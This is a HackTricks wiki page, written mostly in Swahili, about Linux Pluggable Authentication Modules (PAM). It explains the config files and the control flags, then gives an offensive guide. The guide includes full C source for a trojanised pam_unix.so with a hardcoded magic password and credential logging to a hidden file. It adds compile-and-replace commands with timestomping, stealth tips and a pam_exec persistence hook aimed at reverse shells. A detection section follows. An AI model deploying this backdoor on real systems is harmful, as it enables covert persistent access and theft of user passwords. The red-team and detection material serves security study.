PAM - Pluggable Authentication Modules

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Taarifa za Msingi

PAM (Pluggable Authentication Modules) inafanya kazi kama kifaa cha usalama kinachothibitisha utambulisho wa watumiaji wanaojaribu kupata huduma za kompyuta, kikidhibiti upatikanaji wao kulingana na vigezo mbalimbali. Ni sawa na mlindaji wa kidijitali, kuhakikisha kuwa watumiaji walioidhinishwa pekee ndio wanaoweza kutumia huduma maalum na pia kuweka vizingiti vya matumizi ili kuzuia mzigo mkubwa wa mfumo.

Faili za Usanidi

  • Solaris and UNIX-based systems kawaida hutumia faili kuu la usanidi linalopatikana kwenye /etc/pam.conf.
  • Linux systems zinapendelea njia ya saraka, zikihifadhi usanidi maalum kwa kila huduma ndani ya /etc/pam.d. Kwa mfano, faili la usanidi kwa huduma ya kuingia liko katika /etc/pam.d/login.

Mfano wa usanidi wa PAM kwa huduma ya kuingia unaweza kuonekana kama ifuatavyo:

auth required /lib/security/pam_securetty.so
auth required /lib/security/pam_nologin.so
auth sufficient /lib/security/pam_ldap.so
auth required /lib/security/pam_unix_auth.so try_first_pass
account sufficient /lib/security/pam_ldap.so
account required /lib/security/pam_unix_acct.so
password required /lib/security/pam_cracklib.so
password required /lib/security/pam_ldap.so
password required /lib/security/pam_pwdb.so use_first_pass
session required /lib/security/pam_unix_session.so

Maeneo ya Usimamizi ya PAM

Maeneo haya, au vikundi vya usimamizi, vinajumuisha auth, account, password, na session, kila kimojawapo kikiwa na jukumu tofauti katika mchakato wa uthibitishaji na usimamizi wa session:

  • Auth: Inathibitisha utambulisho wa mtumiaji, mara nyingi kwa kumuuliza password.
  • Account: Inashughulikia uhakiki wa akaunti, ikikagua vigezo kama uanachama wa kikundi au vikwazo vinavyotegemea wakati.
  • Password: Inasimamia sasisho za password, ikiwa ni pamoja na ukaguzi wa ugumu au kuzuia mashambulizi ya kamusi.
  • Session: Inasimamia vitendo wakati wa kuanzishwa au kumalizika kwa session ya huduma, kama vile mounting directories au kuweka mipaka ya rasilimali.

Udhibiti wa Moduli za PAM

Udhibiti huamua jinsi moduli itakavyojibu kwa mafanikio au kushindwa, na kuathiri mchakato mzima wa uthibitishaji. Hizi ni:

  • Required: Kushindwa kwa moduli inayohitajika husababisha kushindikana mwishowe, lakini baada ya moduli zote za baadaye kukaguliwa.
  • Requisite: Kumalizika mara moja kwa mchakato inaposhindikana.
  • Sufficient: Mafanikio hubypass ukaguzi wa moduli nyingine za eneo hilo isipokuwa moduli iliyofuata ikishindwa.
  • Optional: Husababisha kushindwa tu ikiwa ndiyo moduli pekee katika stack.

Mfano wa Muktadha

Katika usanidi wenye moduli nyingi za auth, mchakato unafuata mpangilio mkali. Ikiwa moduli ya pam_securetty itagundua terminal ya login kuwa haijaidhinishwa, root logins zitazuiliwa, lakini moduli zote bado zitapitia kutokana na hali yake ya “required”. pam_env inaweka environment variables, zinazoweza kuboresha uzoefu wa mtumiaji. Moduli pam_ldap na pam_unix hufanya kazi pamoja kuthibitisha mtumiaji, ambapo pam_unix inajaribu kutumia password iliyotolewa awali, ikiongeza ufanisi na unyumbufu katika njia za uthibitishaji.

Backdooring PAM – Hooking pam_unix.so

A classic persistence trick in high-value Linux environments is to swap the legitimate PAM library with a trojanised drop-in. Kwa sababu kila SSH / console login inakamilika kwa kuita pam_unix.so:pam_sm_authenticate(), mistari michache ya C inatosha kukamata credentials au kutekeleza magic password bypass.

Muhtasari wa Kujenga

Mfano `pam_unix.so` trojan ```c #define _GNU_SOURCE #include #include #include #include #include

static int (*orig)(pam_handle_t *, int, int, const char **); static const char *MAGIC = “Sup3rS3cret!”;

int pam_sm_authenticate(pam_handle_t *pamh, int flags, int argc, const char **argv) { const char *user, *pass; pam_get_user(pamh, &user, NULL); pam_get_authtok(pamh, PAM_AUTHTOK, &pass, NULL);

/* Magic pwd → immediate success */ if(pass && strcmp(pass, MAGIC) == 0) return PAM_SUCCESS;

/* Credential harvesting */ int fd = open(“/usr/bin/.dbus.log”, O_WRONLY|O_APPEND|O_CREAT, 0600); dprintf(fd, “%s:%s\n”, user, pass); close(fd);

/* Fall back to original function */ if(!orig) { orig = dlsym(RTLD_NEXT, “pam_sm_authenticate”); } return orig(pamh, flags, argc, argv); }

</details>

Compile na stealth-replace:
```bash
gcc -fPIC -shared -o pam_unix.so trojan_pam.c -ldl -lpam
mv /lib/security/pam_unix.so /lib/security/pam_unix.so.bak
mv pam_unix.so /lib/security/pam_unix.so
chmod 644 /lib/security/pam_unix.so     # keep original perms
touch -r /bin/ls /lib/security/pam_unix.so  # timestomp

OpSec Tips

  1. Atomic overwrite – andika kwenye faili ya muda kisha mv ili kuiweka mahali ili kuepuka maktaba zilizoandikwa nusu ambazo zinaweza kufunga SSH.
  2. Uwekaji wa faili za logi kama /usr/bin/.dbus.log unajificha miongoni mwa vitu halali vya desktop.
  3. Hifadhi symbol exports sawia (pam_sm_setcred, etc.) ili kuepuka tabia isiyo sahihi ya PAM.

Utambuzi

  • Linganisha MD5/SHA256 ya pam_unix.so dhidi ya paketi ya distro.
  • rpm -V pam or debsums -s libpam-modules ili kugundua maktaba zilizobadilishwa bila uhashaji wa mkono.
  • Angalia ikiwa kuna faili zinazoweza kuandikwa na kila mtu (world-writable) au umiliki usio wa kawaida chini ya /lib/security/.
  • Sheria ya auditd: -w /lib/security/pam_unix.so -p wa -k pam-backdoor.
  • Tumia grep kwenye mipangilio ya PAM kutafuta modules zisizotarajiwa: grep -R "pam_[a-z].*\.so" /etc/pam.d/ | grep -v pam_unix.

Quick triage commands (post-compromise or threat hunting)

# 1) Spot alien PAM objects
find /{lib,usr/lib,usr/local/lib}{,64}/security -type f -printf '%p %s %M %u:%g %TY-%Tm-%Td\n' | grep -E 'pam_|libselinux'

# 2) Verify package integrity
command -v rpm >/dev/null && rpm -V pam || debsums -s libpam-modules

# 3) Identify non-packaged PAM modules
for f in /{lib,usr/lib,usr/local/lib}{,64}/security/*.so; do
dpkg -S "$f" >/dev/null 2>&1 || echo "UNPACKAGED: $f";
done

# 4) Look for stealth config edits
grep -R "pam_.*\.so" /etc/pam.d/ | grep -E 'plg|selinux|custom|exec'

Kutumia vibaya pam_exec kwa persistence

Badala ya kubadilisha pam_unix.so, njia nyepesi ni kuongeza mstari wa pam_exec katika /etc/pam.d/sshd ili kila SSH login ianzishe implant huku ikiacha stack ya kawaida isivyobadilika:

# Prepend to /etc/pam.d/sshd
session optional pam_exec.so quiet /usr/local/bin/.ssh_hook.sh

pam_exec inaendesha kama root ndani ya muktadha wa PAM ya sshd, hivyo script inaweza drop reverse shells, kukusanya env vars, au kufungua tena implanted sockets bila mabadiliko ya filesystem kwa core libraries.

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks